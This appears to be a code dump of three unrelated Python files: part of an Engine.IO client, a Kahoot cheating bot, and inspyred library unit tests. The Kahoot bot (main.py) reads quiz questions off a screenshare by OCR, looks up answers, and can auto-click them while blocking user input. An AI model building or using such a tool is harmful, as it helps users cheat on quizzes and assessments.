self._send_packet(packet.Packet(packet.PONG, pkt.data))
elif pkt.packet_type == packet.CLOSE:
self.disconnect(abort=True)
elif pkt.packet_type == packet.NOOP:
pass
else:
self.logger.error('Received unexpected packet of type %s',
pkt.packet_type)
def _send_packet(self, pkt):
"""Queue a packet to be sent to the server."""
if self.state != 'connected':
return
self.queue.put(pkt)
self.logger.info(
'Sending packet %s data %s',
packet.packet_names[pkt.packet_type],
pkt.data if not isinstance(pkt.data, bytes) else '<binary>')
def _send_request(
self, method, url, headers=None, body=None,
timeout=None): # pragma: no cover
if self.http is None:
self.http = requests.Session()
if not self.ssl_verify:
self.http.verify = False
try:
return self.http.request(method, url, headers=headers, data=body,
timeout=timeout)
except requests.exceptions.RequestException as exc:
self.logger.info('HTTP %s request to %s failed with error %s.',
method, url, exc)
return str(exc)
def _trigger_event(self, event, *args, **kwargs):
"""Invoke an event handler."""
run_async = kwargs.pop('run_async', False)
if event in self.handlers:
if run_async:
return self.start_background_task(self.handlers[event], *args)
else:
try:
return self.handlers[event](*args)
except:
self.logger.exception(event + ' handler error')
def _get_engineio_url(self, url, engineio_path, transport):
"""Generate the Engine.IO connection URL."""
engineio_path = engineio_path.strip('/')
parsed_url = urllib.parse.urlparse(url)
if transport == 'polling':
scheme = 'http'
elif transport == 'websocket':
scheme = 'ws'
else: # pragma: no cover
raise ValueError('invalid transport')
if parsed_url.scheme in ['https', 'wss']:
scheme += 's'
return ('{scheme}://{netloc}/{path}/?{query}'
'{sep}transport={transport}&EIO=4').format(
scheme=scheme, netloc=parsed_url.netloc,
path=engineio_path, query=parsed_url.query,
sep='&' if parsed_url.query else '',
transport=transport)
def _get_url_timestamp(self):
"""Generate the Engine.IO query string timestamp."""
return '&t=' + str(time.time())
def _read_loop_polling(self):
"""Read packets by polling the Engine.IO server."""
while self.state == 'connected':
self.logger.info(
'Sending polling GET request to ' + self.base_url)
r = self._send_request(
'GET', self.base_url + self._get_url_timestamp(),
timeout=max(self.ping_interval, self.ping_timeout) + 5)
if r is None or isinstance(r, str):
self.logger.warning(
r or 'Connection refused by the server, aborting')
self.queue.put(None)
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self.queue.put(None)
break
try:
p = payload.Payload(encoded_payload=r.content.decode('utf-8'))
except ValueError:
self.logger.warning(
'Unexpected packet from server, aborting')
self.queue.put(None)
break
for pkt in p.packets:
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _read_loop_websocket(self):
"""Read packets from the Engine.IO WebSocket connection."""
while self.state == 'connected':
p = None
try:
p = self.ws.recv()
except websocket.WebSocketTimeoutException:
self.logger.warning(
'Server has stopped communicating, aborting')
self.queue.put(None)
break
except websocket.WebSocketConnectionClosedException:
self.logger.warning(
'WebSocket connection was closed, aborting')
self.queue.put(None)
break
except Exception as e:
self.logger.info(
'Unexpected error receiving packet: "%s", aborting',
str(e))
self.queue.put(None)
break
try:
pkt = packet.Packet(encoded_packet=p)
except Exception as e: # pragma: no cover
self.logger.info(
'Unexpected error decoding packet: "%s", aborting', str(e))
self.queue.put(None)
break
self._receive_packet(pkt)
self.logger.info('Waiting for write loop task to end')
self.write_loop_task.join()
if self.state == 'connected':
self._trigger_event('disconnect', run_async=False)
try:
connected_clients.remove(self)
except ValueError: # pragma: no cover
pass
self._reset()
self.logger.info('Exiting read loop task')
def _write_loop(self):
"""This background task sends packages to the server as they are
pushed to the send queue.
"""
while self.state == 'connected':
# to simplify the timeout handling, use the maximum of the
# ping interval and ping timeout as timeout, with an extra 5
# seconds grace period
timeout = max(self.ping_interval, self.ping_timeout) + 5
packets = None
try:
packets = [self.queue.get(timeout=timeout)]
except self.queue.Empty:
self.logger.error('packet queue is empty, aborting')
break
if packets == [None]:
self.queue.task_done()
packets = []
else:
while True:
try:
packets.append(self.queue.get(block=False))
except self.queue.Empty:
break
if packets[-1] is None:
packets = packets[:-1]
self.queue.task_done()
break
if not packets:
# empty packet list returned -> connection closed
break
if self.current_transport == 'polling':
p = payload.Payload(packets=packets)
r = self._send_request(
'POST', self.base_url, body=p.encode(),
headers={'Content-Type': 'text/plain'},
timeout=self.request_timeout)
for pkt in packets:
self.queue.task_done()
if r is None or isinstance(r, str):
self.logger.warning(
r or 'Connection refused by the server, aborting')
break
if r.status_code < 200 or r.status_code >= 300:
self.logger.warning('Unexpected status code %s in server '
'response, aborting', r.status_code)
self._reset()
break
else:
# websocket
try:
for pkt in packets:
encoded_packet = pkt.encode()
if pkt.binary:
self.ws.send_binary(encoded_packet)
else:
self.ws.send(encoded_packet)
self.queue.task_done()
except (websocket.WebSocketConnectionClosedException,
BrokenPipeError, OSError):
self.logger.warning(
'WebSocket connection was closed, aborting')
break
self.logger.info('Exiting write loop task')
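# Minimal usage sketch (assumes a reachable Engine.IO server; it mirrors the
# examples already given in the docstrings above):
#
#   import engineio
#   eio = engineio.Client()
#
#   @eio.on('message')
#   def on_message(data):
#       print('received:', data)
#
#   eio.connect('http://localhost:5000')
#   eio.send('hello')
#   eio.wait()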
|
main.py
|
'''
KAHOOT ANSWER GIVER FROM GOOGLEMEET SCREENSHARE
DATE: 25/02/2020
AUTHOR: ARRZ.DEV
'''
#DEFAULT
import os
from os import system
import sys
from time import sleep
import json
import datetime
from threading import Thread
import win32api, win32con
from ctypes import *
#NORMALIZER MODULE
import unidecode
#COLORIZED
import colorama
#SELF-MADE MODULES
from modules.db_management import *
from modules.algorithms import *
#IMAGING MODULES
import numpy as np
from PIL import ImageGrab, Image, ImageOps, ImageFilter
import pytesseract
# --SETTINGS--
autop = False #AUTO PLAY AI [TRUE / FALSE]
banner = '''\033[93m
_ __ _ _ _ ___ ___ _____ ___ ___ _____
| |/ / /_\ | || |/ _ \ / _ \_ _|__| _ )/ _ \_ _|
| ' < / _ \| __ | (_) | (_) || ||___| _ \ (_) || |
|_|\_\/_/ \_\_||_|\___/ \___/ |_| |___/\___/ |_|
'''
#SET FUNCTIONS
def SetTitle(title=False):
if not title:
return 'you need to specify a title'
system(f'title "{title}"')
def SetWindow():
#SET HEIGHT AND WIDTH
system('mode con:cols=65 lines=35')
#CALL DISPLAY FUNCTION
Display(status='Getting user topic input')
def SetDB(topic=False):
global db
    #LIST THE DATABASE FILES ALREADY SAVED ON DISK
    dbs = [f for f in os.listdir('databases')]
    if not topic.endswith('.json'):
topic = f'{topic}.json'
    #IF THE TOPIC HAS NO DATABASE YET, SCRAPE THE LINKS AND BUILD ONE
if topic not in dbs:
#GET LANGUAGE
language = str(input(' Language (pt or en): '))
#GET THE KAHOOT LINKS
raw_topic = topic.replace('.json', '')
Display(status='Getting Links')
top_links = get_links(topic=raw_topic, language=language)
Display(status=f'Building Database of {raw_topic}')
db = create_db(top_links)
#SAVE THE DATA IN THE FILE SPECIFIED EARLIER
with open(f'databases/{topic}', 'w') as f:
f.write(str(db))
    #OTHERWISE LOAD THE EXISTING DATABASE
else:
#LOAD THE DB FROM THE FILE SPECIFIED EARLIER
Display(status='Loading Database')
db = json.loads(open(f'databases/{topic}').read().replace('\'', '"'))
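# The database built or loaded above is a flat question -> answer mapping,
# e.g. (hypothetical entry):
#   {"what is the capital of france": "paris"}
# Gaming() below first tries an exact key lookup, then falls back to the
# fuzzy identify_question() match.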
#INFORMATION PROCESSING FUNCTIONS
def Imaging():
while True:
#REAL TIME LOAD COORDS CONFIG
        coords = json.loads(open('coords.json').read())
fullscreen_coords = coords['ingame']
full_img = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off'],fullscreen_coords['width'],fullscreen_coords['height']))))
question_game_image = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off']+5,fullscreen_coords['width'],420))))
question_loading_image = np.array(FilterImage(ImageGrab.grab(bbox=(fullscreen_coords['x-off'],fullscreen_coords['y-off']+200,fullscreen_coords['width'],645))))
#cv2.imshow('aa', full_img)
#cv2.imshow('bb', question_game_image)
#cv2.imshow('cc', question_loading_image)
        #RE-CHECK FROM THE TOP WHILE IN THE LOBBY (the previous recursive
        #Imaging() call here could grow the stack indefinitely)
        if Waiting(full_img):
            continue
#GET RESPONSE FROM THE FUNCTION
if not Gaming(question_game_image):
Gaming(question_loading_image)
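# coords.json is expected to hold one pixel box per screen region, keyed by
# the names read above ('ingame', 'answer_top_left', 'answer_5050_left', ...),
# e.g. (hypothetical values):
#   {"ingame": {"x-off": 0, "y-off": 0, "width": 1920, "height": 1080}}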
def Waiting(image):
global Flag
global last_status
waiting_texts = ['waiting for players', 'join', 'start', 'entre', 'iniciar', 'aguardando jogadores']
    page_text = ''
    try:
        page_text = (pytesseract.image_to_string(image, lang='eng')).lower()
    except:
        pass
if any(x in page_text for x in waiting_texts):
last_status = 'Waiting for game to start'
Display(status=last_status)
Flag = False
return True
else:
Flag = True
last_status = 'Game Running'
Display(status=last_status)
return False
def Gaming(image):
global last_answer
global last_question
global last_probability
#GET RAW TEXT FROM IMAGE
raw_question = unidecode.unidecode((pytesseract.image_to_string(image, lang='eng')).lower()).strip()
#CLEAN RAW QUESTION
question = CleanRaw(raw_question)
#LOGIC TO DISPLAY THE ANSWER, PROBABILITY ETC..
if question != '' and question != last_question:
        #TRY TO GET THE ANSWER IN CASE THE QUESTION MATCHES 100%
try:
answer = db[question]
if answer != last_answer:
#CALL DISPLAY WITH ANSWER
last_probability = '100'
last_answer = answer
last_question = question
Display(question=question, answer=answer, probability='100')
        #IF AN EXCEPTION WAS RAISED, THE QUESTION DOESN'T MATCH 100% IN THE DATABASE
except:
#RUN ALGORITHM AND GET ANSWER WITH THE BEST FITNESS
probability, question = identify_question(dictionary=db, question=question)
#SET THE CORRECT ANSWER IF THE PROBABILITY IS GREATER THAN 40% AND THE ANSWER IS DIFFERENT FROM THE ONE THAT IS ALREADY SET
if probability > 40:
answer = db[question]
if answer != last_answer:
#CALL DISPLAY WITH ANSWER
last_answer = answer
last_question = question
last_probability = probability
Display(question=question, answer=answer, probability=probability)
else:
return False
def AutoPlay():
last_action = ''
def click(x,y):
#BLOCKING USER INPUT
windll.user32.BlockInput(True)
#MOVE CURSOR TO THE POSITION
win32api.SetCursorPos((x,y))
#PERFORM A CLICK 2 TIMES
for i in range(2):
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)
sleep(0.02) #This pauses the script for 0.02 seconds
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)
#MOVE THE MOUSE TO THE MIDDLE OF THE BUTTONS
win32api.SetCursorPos((1425,215))
#ENABLE USER INPUT
windll.user32.BlockInput(False)
while True:
        coords = json.loads(open('coords.json').read())
if any(last_answer == x for x in ['verdadeira', 'falsa', 'true', 'false', 'falso', 'verdadeiro']):
#['verdadeiro', 'falso', 'true', 'false']
fiftyfifty_left = coords['answer_5050_left']
fiftyfifty_right = coords['answer_5050_right']
fiftyfifty_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(fiftyfifty_left['x-off'],fiftyfifty_left['y-off'],fiftyfifty_left['width'],fiftyfifty_left['height']))))
fiftyfifty_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(fiftyfifty_right['x-off'],fiftyfifty_right['y-off'],fiftyfifty_right['width'],fiftyfifty_right['height']))))
raw_array = [fiftyfifty_left_btn, fiftyfifty_right_btn]
#GET TEXT, CLEAN IT, AND ADD IT TO A CLEAN ARRAY
clean_array = []
for button in raw_array:
raw_answer = unidecode.unidecode((pytesseract.image_to_string(button, lang='eng')).lower()).strip()
clean_array.append(raw_answer)
#CHECK SO WE DONT REPEAT THE SAME CLICK ACTION AS BEFORE
if last_answer != last_action:
#GET THE INDEX OF THE ANSWER
algo_response = identify_answer_index(answer=last_answer, dictionary=clean_array)
#IF a != False and probability > 0
if algo_response:
if algo_response[0] > 0:
Display(lurdes_status='Let me help you!')
#OVERWRITE THE LAST ACTION WITH THE NEW ANSWER ACTION
last_action = last_answer
#DEFINE INDEX OF THE ANSWER
index = algo_response[1]
if index == 0:
click(coords["player_5050_left"]["x-off"], coords["player_5050_left"]["y-off"])
button = 'left'
elif index == 1:
click(coords["player_5050_right"]["x-off"], coords["player_5050_right"]["y-off"])
button = 'right'
sleep(1)
Display(lurdes_status=f'Clicked the {button} button ({last_answer})')
else:
#button_cords
top_left = coords['answer_top_left']
top_right = coords['answer_top_right']
bottom_right = coords['answer_bottom_right']
bottom_left = coords['answer_bottom_left']
#BUTTONS IMAGE
top_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(top_left['x-off'],top_left['y-off'],top_left['width'],top_left['height']))))
top_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(top_right['x-off'],top_right['y-off'],top_right['width'],top_right['height']))))
bottom_left_btn = np.array(FilterImage(ImageGrab.grab(bbox=(bottom_left['x-off'],bottom_left['y-off'],bottom_left['width'],bottom_left['height']))))
bottom_right_btn = np.array(FilterImage(ImageGrab.grab(bbox=(bottom_right['x-off'],bottom_right['y-off'],bottom_right['width'],bottom_right['height']))))
raw_array = [top_left_btn, top_right_btn, bottom_left_btn, bottom_right_btn]
#GET TEXT, CLEAN IT, AND ADD IT TO A CLEAN ARRAY
clean_array = []
for button in raw_array:
raw_answer = unidecode.unidecode((pytesseract.image_to_string(button, lang='eng')).lower()).strip()
clean_array.append(raw_answer)
#CHECK SO WE DONT REPEAT THE SAME CLICK ACTION AS BEFORE
if last_answer != last_action:
                Display(lurdes_status="I'm thinking..")
#GET THE INDEX OF THE ANSWER
algo_response = identify_answer_index(answer=last_answer, dictionary=clean_array)
#IF a != False and probability > 0
if algo_response:
if algo_response[0] > 0:
#OVERWRITE THE LAST ACTION WITH THE NEW ANSWER ACTION
last_action = last_answer
#DEFINE INDEX OF THE ANSWER
index = algo_response[1]
if index == 0:
click(coords["player_top_left"]["x-off"], coords["player_top_left"]["y-off"])
button = 'top left'
elif index == 1:
click(coords["player_top_right"]["x-off"], coords["player_top_right"]["y-off"])
button = 'top right'
elif index == 2:
click(coords["player_bottom_left"]["x-off"], coords["player_bottom_left"]["y-off"])
button = 'bottom left'
elif index == 3:
click(coords["player_bottom_right"]["x-off"], coords["player_bottom_right"]["y-off"])
button = 'bottom right'
sleep(1)
Display(lurdes_status=f'Clicked the {button} button ({last_answer})')
#DISPLAY FUNCTION
def Display(status=False, question=False, answer=False, probability=False, lurdes_status=False):
if not question or not answer or not probability:
question = last_question
probability = last_probability
answer = last_answer
if not status:
status = last_status
if not lurdes_status:
lurdes_status = 'I\'m alive!'
#CHANGE TITLE
SetTitle(title=status)
#PROBABILITY ROUND
probability = str(probability)[:4]
#RE-STRUCT
if len(question) == 0:
question = ' '*48
elif len(question) < 46:
question = f'{question}..{(46-len(question))*" "}'
else:
question = f'{question[:46]}..'
if len(answer) == 0:
answer = ' '*48
elif len(answer) < 46:
answer = f'{answer}..{(46-len(answer))*" "}'
else:
answer = f'{answer[:46]}..'
if len(status) < 48:
status = f'{status}{(48-len(status))*" "}'
#LURDES STATUS
if len(lurdes_status) < 48:
lurdes_status = f'{lurdes_status}{(48-len(lurdes_status))*" "}'
else:
lurdes_status = f'{lurdes_status[:46]}..'
#ROUND PROBABILITY
if len(str(probability)) == 0:
probability = ' '*47
elif str(probability)[:3] == '100':
probability = f'{str(probability)[:3]}%{" "*43}'
else:
probability = f'{str(probability)[:4]}%{" "*42}'
#CHANGE COLOR CONSOANT STATUS
if 'running' in status.lower():
status = f'\033[92m{status}\033[94m'
else:
status = f'\033[91m{status}\033[94m'
ClearWindow()
print(banner)
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mSTATUS:\033[94m |
| {status} |
|--------------------------------------------------|
''')
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mPERGUNTA:\033[94m |
| \033[92m{question.capitalize()}\033[94m |
|--------------------------------------------------|
| \033[93mRESPOSTA:\033[94m |
| \033[92m{answer.capitalize()}\033[94m |
|--------------------------------------------------|
| \033[93mPROBABILIDADE DE ACERTO:\033[94m |
| \033[92m{probability}\033[94m |
|--------------------------------------------------|
''')
if autop:
print(f'''\033[94m
|--------------------------------------------------|
| \033[93mA.I: \033[94m |
| \033[92m{lurdes_status}\033[94m |
|--------------------------------------------------|
''')
#OTHER FUNCTIONS
def CleanRaw(text):
    #CLEAN THE QUESTION TEXT: RETURN THE FIRST LINE LONG ENOUGH TO BE A QUESTION
    sliced_question = text.split('\n')
    for slice_ in sliced_question:
        if len(slice_) > 10:
            return slice_.strip()
    return ''
def ClearWindow():
if sys.platform.startswith('linux'):
system('clear')
else:
system('cls')
def FilterImage(image):
return ImageOps.grayscale(image).filter(ImageFilter.MinFilter(1)).filter(ImageFilter.SMOOTH_MORE).filter(ImageFilter.SMOOTH_MORE)
if __name__ == '__main__':
#INIT COLORAMA AUTO-RESET
colorama.init(autoreset=True)
    #INIT GLOBAL VARIABLES
pytesseract.pytesseract.tesseract_cmd = r"C:\Program Files (x86)\Tesseract-OCR\tesseract.exe"
Flag = False
last_question = ''
last_answer = ''
last_status = ''
last_probability = ''
db = None
#INIT AUTOPLAY IN CASE ITS TRUE
if autop:
t = Thread(target=(AutoPlay))
t.start()
#SET WINDOW
SetWindow()
#SET DB BY SCRAPING OR LOADING
SetDB(topic=str(input(' Topico: ')),)
#START THE MAIN FUNCTION
Imaging()
|
operator_tests.py
|
import unittest
import random
import logging
import itertools
import multiprocessing
import inspyred
class DummyEC(object):
pass
def test_generator(random, args):
return [random.random() for _ in range(6)]
def test_evaluator(candidates, args):
fitness = []
for c in candidates:
fitness.append(sum(c))
return fitness
def test_evaluator_mo(candidates, args):
fitness = []
for c in candidates:
fitness.append(inspyred.ec.emo.Pareto([sum(c), sum(c)]))
return fitness
def test_set_up(generator, evaluator):
pop_size = 12
prng = random.Random()
prng.seed(111111)
candidates = [generator(prng, {}) for _ in range(pop_size)]
fitnesses = evaluator(candidates, {})
population = [inspyred.ec.Individual(candidate=c) for c in candidates]
for i, f in zip(population, fitnesses):
i.fitness = f
parents = population[:pop_size//2]
offspring = population[pop_size//2:]
return (prng, candidates, fitnesses, population, parents, offspring)
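# test_set_up builds the shared fixture: 12 random 6-gene candidates, their
# fitnesses, the wrapped Individual population, and a parents/offspring split
# down the middle. Every TestCase below unpacks this same tuple in setUp.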
def test_process(random, population, migrator, output_queue):
for i in range(9999):
population = migrator(random, population, {})
output_queue.put(population)
class ArchiverTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator_mo)
def test_default_archiver(self):
new_archive = inspyred.ec.archivers.default_archiver(self.prng, list(self.population), [], {})
assert not new_archive
def test_best_archiver(self):
new_archive = inspyred.ec.archivers.best_archiver(self.prng, list(self.population), [], {})
assert new_archive == [max(self.population)]
def test_adaptive_grid_archiver(self):
new_archive = inspyred.ec.archivers.adaptive_grid_archiver(self.prng, list(self.population), [], {})
assert len(new_archive) == 1
class MigratorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
def test_default_migration(self):
migrants = inspyred.ec.migrators.default_migration(self.prng, list(self.population), {})
assert migrants == self.population
# Multiprocessing migration test may fail simply due to randomness of the migration.
# It is recommended to run the test multiple times to make sure that it consistently
# fails before spending time looking for errors.
def test_multiprocessing_migration(self):
queue = multiprocessing.Queue()
migrator = inspyred.ec.migrators.MultiprocessingMigrator()
populations = [["red", "orange", "yellow", "green", "blue", "indigo", "violet"],
[1, 2, 3, 4, 5, 6, 7],
["bashful", "doc", "dopey", "grumpy", "happy", "sleepy", "sneezy"]]
jobs = []
for pop in populations:
p = multiprocessing.Process(target=test_process, args=(self.prng, list(pop), migrator, queue))
p.start()
jobs.append(p)
for j in jobs:
j.join()
final_pops = []
while queue.qsize() > 0:
final_pops.append(set(queue.get()))
for p in final_pops:
a = p & set(populations[0])
b = p & set(populations[1])
c = p & set(populations[2])
assert len(a) > 0 and len(b) > 0 and len(c) > 0
class ReplacerTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.prng_mo, self.candidates_mo, self.fitnesses_mo, self.population_mo, self.parents_mo, self.offspring_mo = test_set_up(test_generator, test_evaluator_mo)
self.ec = DummyEC()
self.ec.num_evaluations = 10
self.ec.archive = []
self.ec.archiver = inspyred.ec.archivers.adaptive_grid_archiver
def test_default_replacement(self):
survivors = inspyred.ec.replacers.default_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert survivors == self.population
def test_truncation_replacement(self):
survivors = inspyred.ec.replacers.truncation_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.population), max(self.offspring)) == max(survivors)
def test_steady_state_replacement(self):
survivors = inspyred.ec.replacers.steady_state_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and all([o in survivors for o in self.offspring])
def test_generational_replacement(self):
survivors = inspyred.ec.replacers.generational_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert all([s in self.offspring for s in survivors])
def test_random_replacement(self):
survivors = inspyred.ec.replacers.random_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and all([o in survivors for o in self.offspring])
def test_plus_replacement(self):
survivors = inspyred.ec.replacers.plus_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.parents), max(self.offspring)) == max(survivors)
def test_comma_replacement(self):
survivors = inspyred.ec.replacers.comma_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == min(len(self.population), len(self.offspring)) and all([s in self.offspring for s in survivors])
def test_crowding_replacement(self):
survivors = inspyred.ec.replacers.crowding_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring), {})
assert len(survivors) == len(self.population) and max(max(self.population), max(self.offspring)) == max(survivors)
def test_simulated_annealing_replacement(self):
survivors = inspyred.ec.replacers.simulated_annealing_replacement(self.prng, list(self.population), list(self.parents), list(self.offspring),
{'_ec':self.ec, 'max_evaluations':100})
assert len(survivors) == len(self.parents) and max(max(self.parents), max(self.offspring)) == max(survivors)
def test_nsga_replacement(self):
survivors = inspyred.ec.replacers.nsga_replacement(self.prng_mo, list(self.population_mo), list(self.parents_mo), list(self.offspring_mo), {})
assert (len(survivors) == len(self.population_mo) and
max(max(self.population_mo), max(self.offspring_mo)) == max(survivors))
def test_paes_replacement(self):
survivors = inspyred.ec.replacers.paes_replacement(self.prng_mo, list(self.population_mo), list(self.parents_mo), list(self.offspring_mo), {'_ec':self.ec})
assert (len(survivors) == min(len(self.parents_mo), len(self.offspring_mo)) and
max(survivors) == max(max(self.parents_mo), max(self.offspring_mo)))
class SelectorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
def test_default_selection(self):
parents = inspyred.ec.selectors.default_selection(self.prng, list(self.population), {})
assert parents == self.population
def test_truncation_selection(self):
parents = inspyred.ec.selectors.truncation_selection(self.prng, list(self.population), {})
assert all([p in parents for p in self.population])
def test_uniform_selection(self):
parents = inspyred.ec.selectors.uniform_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_fitness_proportionate_selection(self):
parents = inspyred.ec.selectors.fitness_proportionate_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_rank_selection(self):
parents = inspyred.ec.selectors.rank_selection(self.prng, list(self.population), {})
assert len(parents) == 1 and all([p in self.population for p in parents])
def test_tournament_selection(self):
parents = inspyred.ec.selectors.tournament_selection(self.prng, list(self.population), {'tournament_size':len(self.population)})
assert len(parents) == 1 and max(parents) == max(self.population)
class TerminatorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.ec = DummyEC()
self.ec.logger = logging.getLogger('inspyred.test')
def test_default_termination(self):
t = inspyred.ec.terminators.default_termination(list(self.population), 1, 1, {})
assert t == True
def test_diversity_termination(self):
p = [inspyred.ec.Individual(candidate=[1, 1, 1]) for _ in range(10)]
t = inspyred.ec.terminators.diversity_termination(list(p), 1, 1, {})
assert t == True
def test_average_fitness_termination(self):
p = [inspyred.ec.Individual(candidate=i.candidate) for i in self.population]
for x in p:
x.fitness = 1
t = inspyred.ec.terminators.average_fitness_termination(list(p), 1, 1, {})
assert t == True
def test_evaluation_termination(self):
t = inspyred.ec.terminators.evaluation_termination(list(self.population), 1, len(self.population), {})
assert t == True
def test_generation_termination(self):
t = inspyred.ec.terminators.generation_termination(list(self.population), 1, 1, {})
assert t == True
def test_time_termination(self):
t = inspyred.ec.terminators.time_termination(list(self.population), 1, 1, {'_ec':self.ec, 'max_time':0})
assert t == True
class VariatorTests(unittest.TestCase):
def setUp(self):
self.prng, self.candidates, self.fitnesses, self.population, self.parents, self.offspring = test_set_up(test_generator, test_evaluator)
self.ec = DummyEC()
self.ec.bounder = inspyred.ec.Bounder(0, 1)
self.ec.population = list(self.population)
def test_default_variation(self):
offspring = inspyred.ec.variators.default_variation(self.prng, list(self.candidates), {})
assert offspring == self.candidates
def test_n_point_crossover(self):
offspring = inspyred.ec.variators.n_point_crossover(self.prng, list(self.candidates), {'num_crossover_points':3})
moms = self.candidates[::2]
dads = self.candidates[1::2]
dmoms = itertools.chain.from_iterable([[t, t] for t in moms])
ddads = itertools.chain.from_iterable([[t, t] for t in dads])
offs = [(offspring[i], offspring[i+1]) for i in range(0, len(offspring), 2)]
        assert (all([x in m or x in d for m, d, o in zip(dmoms, ddads, offspring) for x in o]) and
                all([(x in o[0] or x in o[1]) and (y in o[0] or y in o[1]) for m, d, o in zip(moms, dads, offs) for x in m for y in d]))
def test_uniform_crossover(self):
offspring = inspyred.ec.variators.uniform_crossover(self.prng, list(self.candidates), {})
moms = self.candidates[::2]
dads = self.candidates[1::2]
dmoms = itertools.chain.from_iterable([[t, t] for t in moms])
ddads = itertools.chain.from_iterable([[t, t] for t in dads])
offs = [(offspring[i], offspring[i+1]) for i in range(0, len(offspring), 2)]
        assert (all([x in m or x in d for m, d, o in zip(dmoms, ddads, offspring) for x in o]) and
                all([(x in o[0] or x in o[1]) and (y in o[0] or y in o[1]) for m, d, o in zip(moms, dads, offs) for x in m for y in d]))
def test_blend_crossover(self):
alpha = 0.1
offspring = inspyred.ec.variators.blend_crossover(self.prng, list(self.candidates), {'_ec':self.ec, 'blx_alpha':alpha})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_arithmetic_crossover(self):
alpha = 0.5
cands = [[0, 0, 0], [1, 1, 1]]
offspring = inspyred.ec.variators.arithmetic_crossover(self.prng, list(cands), {'_ec':self.ec, 'ax_alpha':alpha})
for off in offspring:
for o in off:
assert o == 0.5
def test_heuristic_crossover(self):
offspring = inspyred.ec.variators.heuristic_crossover(self.prng, list(self.candidates), {'_ec':self.ec})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tests.append(x >= min(m, d) and x <= max(m, d))
assert all(tests)
def test_simulated_binary_crossover(self):
alpha = 0.2
offspring = inspyred.ec.variators.simulated_binary_crossover(self.prng, list(self.candidates), {'_ec':self.ec})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_laplace_crossover(self):
alpha = 0.1
offspring = inspyred.ec.variators.laplace_crossover(self.prng, list(self.candidates), {'_ec':self.ec, 'lx_scale': 0.01})
moms = itertools.chain.from_iterable([[t, t] for t in self.candidates[::2]])
dads = itertools.chain.from_iterable([[t, t] for t in self.candidates[1::2]])
tests = []
for mom, dad, off in zip(moms, dads, offspring):
for m, d, x in zip(mom, dad, off):
tol = alpha * (max(m, d) - min(m, d))
tests.append(x >= (min(m, d) - tol) and x <= (max(m, d) + tol))
assert all(tests)
def test_gaussian_mutation(self):
offspring = inspyred.ec.variators.gaussian_mutation(self.prng, list(self.candidates), {'_ec':self.ec})
assert(all([x >= 0 and x <= 1 for o in offspring for x in o]))
def test_bit_flip_mutation(self):
class my_random(object):
def random(self):
return 0
r = my_random()
my_candidate = [1, 0, 1, 0, 1, 1, 0, 0, 0, 1]
offspring = inspyred.ec.variators.bit_flip_mutation(r, list([my_candidate]), {})
assert(all([c != o for c, o in zip(my_candidate, offspring[0])]))
def test_random_reset_mutation(self):
class my_random(object):
def random(self):
return 0
def choice(self, v):
return v[0]
r = my_random()
b = inspyred.ec.DiscreteBounder([1, 2, 3])
self.ec.bounder = b
offspring = inspyred.ec.variators.random_reset_mutation(r, list([[1, 3, 2, 2, 1]]), {'_ec': self.ec})
